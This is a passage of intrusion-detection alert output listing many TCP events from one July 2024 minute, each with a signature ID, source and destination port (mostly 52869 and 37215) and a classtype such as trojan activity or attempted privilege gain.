                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596401
                      SID:2831300
                      Source Port:45956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.025818
                      SID:2831300
                      Source Port:44458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.067320
                      SID:2027339
                      Source Port:52012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.826513
                      SID:2027339
                      Source Port:51264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2835222
                      Source Port:44552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.345402
                      SID:2027339
                      Source Port:39066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2835222
                      Source Port:51462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.054775
                      SID:2027339
                      Source Port:50738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:15.054105
                      SID:2831300
                      Source Port:56492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.611773
                      SID:2831300
                      Source Port:54474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.404325
                      SID:2025132
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.416791
                      SID:2027339
                      Source Port:47972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.623583
                      SID:2831300
                      Source Port:35502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.636234
                      SID:2025132
                      Source Port:50636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.021834
                      SID:2027339
                      Source Port:52308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.926465
                      SID:2831300
                      Source Port:33854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.312083
                      SID:2831300
                      Source Port:57364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.738802
                      SID:2027339
                      Source Port:59328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.001370
                      SID:2027339
                      Source Port:36896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2835222
                      Source Port:57382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313383
                      SID:2027339
                      Source Port:53670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.962852
                      SID:2027339
                      Source Port:59642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966322
                      SID:2025132
                      Source Port:55386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:49214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2027339
                      Source Port:39552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.644828
                      SID:2831300
                      Source Port:45610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.787786
                      SID:2027339
                      Source Port:43082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.426129
                      SID:2025132
                      Source Port:48472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.105908
                      SID:2835222
                      Source Port:50158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2835222
                      Source Port:34426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.086033
                      SID:2025132
                      Source Port:59050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.581974
                      SID:2831300
                      Source Port:34926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.202570
                      SID:2027339
                      Source Port:58744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.894921
                      SID:2027339
                      Source Port:55432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.201912
                      SID:2831300
                      Source Port:57420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.046177
                      SID:2831300
                      Source Port:52732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.084243
                      SID:2831300
                      Source Port:34282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2829579
                      Source Port:54748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:33966
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.381812
                      SID:2027339
                      Source Port:41288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.194002
                      SID:2027339
                      Source Port:52936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.146648
                      SID:2027339
                      Source Port:41232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.957274
                      SID:2835222
                      Source Port:40786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934684
                      SID:2835222
                      Source Port:56506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2835222
                      Source Port:45192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2829579
                      Source Port:37624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816101
                      SID:2829579
                      Source Port:39610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.549051
                      SID:2025132
                      Source Port:42536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.791706
                      SID:2831300
                      Source Port:49938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.326732
                      SID:2025132
                      Source Port:48686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:46582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.064240
                      SID:2835222
                      Source Port:44422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.055028
                      SID:2831300
                      Source Port:54640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2835222
                      Source Port:49432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.522141
                      SID:2027339
                      Source Port:38482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2829579
                      Source Port:60644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.339110
                      SID:2027339
                      Source Port:35216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.600679
                      SID:2027339
                      Source Port:45328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.040108
                      SID:2027339
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:38244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.450134
                      SID:2027339
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:13.454278
                      SID:2025132
                      Source Port:53486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.076019
                      SID:2831300
                      Source Port:38152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.417573
                      SID:2027339
                      Source Port:42700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2835222
                      Source Port:56588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667964
                      SID:2831300
                      Source Port:36898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2829579
                      Source Port:36666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.062724
                      SID:2027339
                      Source Port:55200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.131973
                      SID:2027339
                      Source Port:39576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.954311
                      SID:2027339
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.425705
                      SID:2025132
                      Source Port:39430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.883774
                      SID:2025132
                      Source Port:50866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.148866
                      SID:2831300
                      Source Port:33468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2829579
                      Source Port:41286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:56536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906354
                      SID:2831300
                      Source Port:59750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221190
                      SID:2829579
                      Source Port:42650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2829579
                      Source Port:33680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.370646
                      SID:2025132
                      Source Port:52726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.411586
                      SID:2831300
                      Source Port:35022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.400580
                      SID:2831300
                      Source Port:57238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.808111
                      SID:2027339
                      Source Port:49806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.761962
                      SID:2027339
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.443306
                      SID:2831300
                      Source Port:51260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:49544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.116897
                      SID:2027339
                      Source Port:38352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.537827
                      SID:2027339
                      Source Port:59110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:28.464626
                      SID:2027339
                      Source Port:52100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.056707
                      SID:2027339
                      Source Port:42318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.928013
                      SID:2027339
                      Source Port:48608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.416217
                      SID:2025132
                      Source Port:43360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.177552
                      SID:2025132
                      Source Port:48212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.036421
                      SID:2027339
                      Source Port:43156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.936204
                      SID:2027339
                      Source Port:50724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.060998
                      SID:2835222
                      Source Port:53858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2835222
                      Source Port:34452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.019511
                      SID:2831300
                      Source Port:33072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.647695
                      SID:2835222
                      Source Port:33984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321965
                      SID:2835222
                      Source Port:42484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699478
                      SID:2831300
                      Source Port:35692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.990535
                      SID:2829579
                      Source Port:37940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.168553
                      SID:2025132
                      Source Port:49246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.262354
                      SID:2025132
                      Source Port:55938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2027339
                      Source Port:51006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2829579
                      Source Port:33028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.323034
                      SID:2829579
                      Source Port:35098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.725615
                      SID:2831300
                      Source Port:54942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.209467
                      SID:2025132
                      Source Port:44154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.322613
                      SID:2027339
                      Source Port:38218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2829579
                      Source Port:45902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.313651
                      SID:2025132
                      Source Port:41252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:17.231770
                      SID:2027339
                      Source Port:47788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520254
                      SID:2027339
                      Source Port:48396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.315740
                      SID:2027339
                      Source Port:50866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.584507
                      SID:2027339
                      Source Port:41676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.604763
                      SID:2831300
                      Source Port:38956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.880225
                      SID:2027339
                      Source Port:48754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.756264
                      SID:2027339
                      Source Port:49984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.650213
                      SID:2831300
                      Source Port:51888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.890780
                      SID:2027339
                      Source Port:48176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.196200
                      SID:2027339
                      Source Port:56512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2835222
                      Source Port:50580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2831300
                      Source Port:46844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.085271
                      SID:2025132
                      Source Port:48530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.143706
                      SID:2027339
                      Source Port:38728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.600303
                      SID:2831300
                      Source Port:42888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.084136
                      SID:2027339
                      Source Port:57298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645186
                      SID:2829579
                      Source Port:42260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.956473
                      SID:2027339
                      Source Port:42896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.728323
                      SID:2027339
                      Source Port:48490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.331748
                      SID:2831300
                      Source Port:53304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:59906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653309
                      SID:2829579
                      Source Port:51724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.670071
                      SID:2025132
                      Source Port:35132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.446628
                      SID:2831300
                      Source Port:59160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2829579
                      Source Port:49226
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:55632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.354788
                      SID:2831300
                      Source Port:32794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.013771
                      SID:2025132
                      Source Port:49614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2835222
                      Source Port:41862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.221889
                      SID:2025132
                      Source Port:41782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2835222
                      Source Port:52598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.021221
                      SID:2831300
                      Source Port:47164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.279669
                      SID:2829579
                      Source Port:56928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.059102
                      SID:2025132
                      Source Port:44128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2829579
                      Source Port:42238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.434719
                      SID:2027339
                      Source Port:45008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.874054
                      SID:2027339
                      Source Port:35300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.118060
                      SID:2025132
                      Source Port:49534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220937
                      SID:2835222
                      Source Port:54222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221727
                      SID:2835222
                      Source Port:55506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.775041
                      SID:2027339
                      Source Port:48102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.601975
                      SID:2027339
                      Source Port:47382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.886284
                      SID:2835222
                      Source Port:56316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.485253
                      SID:2025132
                      Source Port:54546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2025132
                      Source Port:39402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.060799
                      SID:2027339
                      Source Port:60402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2835222
                      Source Port:53324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.918790
                      SID:2027339
                      Source Port:58112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.095462
                      SID:2835222
                      Source Port:41082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044538
                      SID:2835222
                      Source Port:58422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.974900
                      SID:2025132
                      Source Port:39232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2829579
                      Source Port:59072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.745085
                      SID:2027339
                      Source Port:33088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.469869
                      SID:2027339
                      Source Port:35636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.108019
                      SID:2027339
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:48232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.725851
                      SID:2835222
                      Source Port:59222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.142024
                      SID:2025132
                      Source Port:58070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.047800
                      SID:2831300
                      Source Port:33026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.052569
                      SID:2027339
                      Source Port:35926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.485617
                      SID:2027339
                      Source Port:55016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.296756
                      SID:2835222
                      Source Port:53070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.945909
                      SID:2025132
                      Source Port:38854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.817297
                      SID:2829579
                      Source Port:60858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.720327
                      SID:2025132
                      Source Port:49880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.163877
                      SID:2027339
                      Source Port:38452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.748808
                      SID:2025132
                      Source Port:33308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.143033
                      SID:2025132
                      Source Port:37250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.476708
                      SID:2025132
                      Source Port:55616
                      Destination Port:52869
                      Protocol:TCP
